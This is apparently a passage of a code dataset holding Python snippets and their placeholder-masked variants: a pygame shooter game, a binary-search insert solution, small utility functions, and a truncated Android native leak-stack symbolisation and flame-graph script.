range(len(gun.bullets)):\n for i in range(len(gun.bullets)):\n try:\n if gun.bullets[j].x > enemies[i].x and gun.bullets[j\n ].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i\n ].y and gun.bullets[j].y < enemies[i].y + 25:\n del enemies[i]\n except IndexError:\n pass\n for j in range(len(gun.bullets2)):\n for i in range(len(gun.bullets2)):\n try:\n if gun.bullets2[j].x > player.x and gun.bullets2[j\n ].x < player.x + 25 and gun.bullets2[j\n ].y > player.y and gun.bullets2[j].y < player.y + 25:\n for i in range(len(hit) - 1):\n if not (hit[i].x > player.x or hit[i].x < player.x +\n 25 or hit[i].y > player.y or hit[i].y < player.y):\n del hit[i]\n if hit.count(gun.bullets2[j]) == 0:\n hit.append(gun.bullets2[j])\n player.lives = 5 - len(hit)\n except IndexError:\n pass\n if key[pygame.K_a]:\n player.x -= 3\n if key[pygame.K_d]:\n player.x += 3\n if key[pygame.K_w]:\n player.y -= 3\n if key[pygame.K_s]:\n player.y += 3\n if frames % 150 == 0:\n cmd.spawn()\n if player.lives < 1:\n pygame.quit()\n break\n player.image = pygame.image.load('player.jpg').convert()\n player.image = player.image.copy()\n player.image = pygame.transform.rotate(player.image, player.rotate(Mpos\n [0], Mpos[1]))\n angle = player.rotate(Mpos[0], Mpos[1])\n player.draw()\n pygame.display.update()\n time.sleep(0.005)\nquit()\n", "<import token>\n<code token>\n<assignment token>\n\n\nclass Player:\n\n def __init__(self):\n self.x = 275\n self.y = 275\n self.image = pygame.image.load('player.jpg')\n self.image1 = pygame.image.load('hearts.png')\n self.lives = 5\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n\n\nclass Player:\n <function token>\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n\n\nclass Player:\n <function token>\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n\n\nclass Player:\n <function token>\n <function token>\n <function token>\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n <function token>\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n\n\nclass Bullet:\n <function token>\n <function token>\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Gun:\n <function token>\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Gun:\n <function token>\n <function token>\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Gun:\n <function token>\n <function token>\n <function token>\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n <function token>\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n <function token>\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n <function token>\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n <function token>\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Enemy:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
12
0a7ffc027511d5fbec0076f6b25a6e3bc3dfdd9b
''' Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order. You may assume no duplicates in the array. Here are few examples. [1,3,5,6], 5 -> 2 [1,3,5,6], 2 -> 1 [1,3,5,6], 7 -> 4 [1,3,5,6], 0 -> 0 ''' class Solution(object): def searchInsert(self, nums, target): if target < nums[0]: return 0 if target > nums[-1]: return len(nums) l_idx, h_idx = 0, len(nums)-1 while True: m_idx = int((l_idx+h_idx)/2) if l_idx >= h_idx: return l_idx elif target > nums[m_idx]: l_idx = m_idx + 1 else: h_idx = m_idx sol = Solution() print sol.searchInsert([1,3,5,6], 5) print sol.searchInsert([1,3,5,6], 2) print sol.searchInsert([1,3,5,6], 4) print sol.searchInsert([1,3,5,6], 0)
[ "'''\nGiven a sorted array and a target value, return the index if the target is found.\nIf not, return the index where it would be if it were inserted in order.\n\nYou may assume no duplicates in the array.\n\nHere are few examples.\n[1,3,5,6], 5 -> 2\n[1,3,5,6], 2 -> 1\n[1,3,5,6], 7 -> 4\n[1,3,5,6], 0 -> 0\n'''\n\nclass Solution(object):\n def searchInsert(self, nums, target):\n if target < nums[0]:\n return 0\n if target > nums[-1]:\n return len(nums)\n\n l_idx, h_idx = 0, len(nums)-1\n\n while True:\n m_idx = int((l_idx+h_idx)/2)\n if l_idx >= h_idx:\n return l_idx\n elif target > nums[m_idx]:\n l_idx = m_idx + 1\n else:\n h_idx = m_idx\n\nsol = Solution()\nprint sol.searchInsert([1,3,5,6], 5)\nprint sol.searchInsert([1,3,5,6], 2)\nprint sol.searchInsert([1,3,5,6], 4)\nprint sol.searchInsert([1,3,5,6], 0)\n\n" ]
true
13
2cbce618d1ec617d1c7dc0e9792b6a49361ec5a4
def mais_populoso(dic): p=0 sp=0 for t,i in dic.items(): for m in dic[t].values(): p+=m if p>sp: sp=p x=t return x
[ "def mais_populoso(dic):\n p=0\n sp=0\n for t,i in dic.items():\n for m in dic[t].values():\n p+=m\n if p>sp:\n sp=p\n x=t\n return x", "def mais_populoso(dic):\n p = 0\n sp = 0\n for t, i in dic.items():\n for m in dic[t].values():\n p += m\n if p > sp:\n sp = p\n x = t\n return x\n", "<function token>\n" ]
false
14
2092ead8b8f268a22711b8af8052241c1ac00c15
wage=5 print("%d시간에 %d%s 벌었습니다." %(1, wage*1, "달러")) print("%d시간에 %d%s 벌었습니다." %(5, wage*5, "달러")) print("%d시간에 %.1f%s 벌었습니다" %(1,5710.8,"원")) print("%d시간에 %.1f%s 벌었습니다" %(5, 28554.0, "원"))
[ "\nwage=5\n\nprint(\"%d시간에 %d%s 벌었습니다.\" %(1, wage*1, \"달러\"))\nprint(\"%d시간에 %d%s 벌었습니다.\" %(5, wage*5, \"달러\"))\n\nprint(\"%d시간에 %.1f%s 벌었습니다\" %(1,5710.8,\"원\"))\nprint(\"%d시간에 %.1f%s 벌었습니다\" %(5, 28554.0, \"원\"))\n\n", "wage = 5\nprint('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))\nprint('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))\nprint('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))\nprint('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))\n", "<assignment token>\nprint('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))\nprint('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))\nprint('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))\nprint('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))\n", "<assignment token>\n<code token>\n" ]
false
15
b5cbb73c152dd60e9063d5a19f6182e2264fec6d
#!/usr/bin/python # coding=UTF-8 import sys import subprocess import os def printReportTail(reportHtmlFile): reportHtmlFile.write(""" </body> </html> """) def printReportHead(reportHtmlFile): reportHtmlFile.write("""<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> """) def printTitle(reportHtmlFile, title): reportHtmlFile.write("<h2>" + title + "</h2>\n") def printText(reportHtmlFile, text): reportHtmlFile.write("<h4>" + text + "</h4>\n") def printSVG(reportHtmlFile, svgPath): reportHtmlFile.write('<embed src="') reportHtmlFile.write(svgPath) reportHtmlFile.write('" type="image/svg+xml" />') def ParseStack(currentPath, ndkPath, stackFile, architecture, symbolsDir): print "currentPath: " + currentPath # 查找addr2line文件 print "architecture is " + architecture if architecture == "arm64-v8a": addr2line = ndkPath + "/toolchains/aarch64-linux-android-4.9/prebuilt/darwin-x86_64/bin/aarch64-linux-android-addr2line" elif architecture == "armeabi" or architecture == "armeabi-v7a": addr2line = ndkPath + "/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-addr2line" else: print "do not support architecture type for " + architecture print "only support armeabi/armeabi-v7a/arm64-v8a" return print "addr2line path: " + addr2line if not os.path.exists(addr2line): print "can not find " + architecture + " addr2line" else: print "find " + architecture + " addr2line" reportHtmlPath = os.path.split(stackFile)[0] + "/leakReport.html" if os.path.exists(reportHtmlPath): os.unlink(reportHtmlPath) reportHtmlFile = open(reportHtmlPath, "a") printReportHead(reportHtmlFile) # 处理stack文件 for line in open(stackFile): if line.startswith("libName:"): libName = line.replace("libName:", "").replace('\n', '').replace('\r', '') printTitle(reportHtmlFile, libName) libAbsolutePath = os.path.split(stackFile)[0] + "/" + libName if not os.path.exists(libAbsolutePath): os.makedirs(libAbsolutePath) flStackFilePath = libAbsolutePath + "/fl_stack.txt" flameGraphFile = open(flStackFilePath, "w") print "find lib: " + libName elif line.startswith("leakSize:"): leakSize = line.replace("leakSize:", "").replace('\n', '').replace('\r', '') leakMsg = "leak size: " + leakSize + "\n" printText(reportHtmlFile, leakMsg) print leakMsg elif line.startswith("stack:"): stack = line.replace("stack:", "").replace('\n', '').replace('\r', '') # print "stack: " for stackElement in stack.split("^"): if stackElement == "": continue dlinfo = stackElement.split("|") pc = dlinfo[0] libPath = dlinfo[1] symbol = dlinfo[2] # print "pc " + pc + " " + libPath + " " + symbol symbolFile = symbolsDir + "/" + os.path.split(libPath)[1] if os.path.exists(symbolFile): # print "---------" parseCommend = addr2line + " -Ce " + symbolFile + " -f " + pc # print parseCommend # os.system(parseCommend) result = os.popen(parseCommend) res = result.read() retraces = res.splitlines() if len(retraces) != 2 or "?" in retraces[0] or "?" in retraces[1]: if symbol != "": method = symbol codeLine = -1 else: method = pc codeLine = -1 else: method = retraces[0] codeLine = retraces[1] # print method # print codeLine elif symbol != "": method = symbol codeLine = -1 else: method = pc codeLine = -1 flameGraphFile.write(method + ";") flameGraphFile.write(" 1\n") elif line.replace('\n', '').replace('\r', '') == "libSplit!!!": # 结束了一个lib的输出 print "finish lib " + libName + " parse" plExePath = os.path.split(currentPath)[0] + "/flamegraph.pl" svgPath = 